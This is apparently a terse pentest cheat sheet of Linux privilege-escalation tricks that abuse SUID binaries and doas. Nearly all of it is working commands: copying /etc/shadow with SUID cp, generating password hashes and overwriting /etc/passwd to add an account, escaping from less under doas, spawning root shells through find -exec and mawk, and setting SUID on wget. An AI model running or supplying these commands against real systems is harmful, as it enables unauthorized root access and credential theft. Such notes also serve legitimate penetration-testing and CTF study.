SUID Files


# cp -- Il cp is SUID, you can copy privilegied files to /tmp and read them
cp /etc/shadow /tmp

# generate new account
openssl passwd -1 -salt username password
# Then create a fake /etc/passwd file, upload it to the target and cp
cp passwd /etc/passwd


# doas
cat /etc/doas.conf
doas /usr/bin/less /var/log/authlog
# Press v to escape vi then


# find
touch raj
find raj -exec "whoami" \;
find raj -exec "/bin/sh" \;

# another method
find /home –exec chmod u+s /usr/bin/wget \;
ls –la /usr/bin/wget
cat /etc/passwd
# then create another etc/passwd file and upload it


# micro editor
cat /etc/passwd | /usr/bin/micro

# Then generate another user
openssl passwd -1 -salt user3 pass123


# mawk
mawk 'BEGIN {system("/bin/sh")}'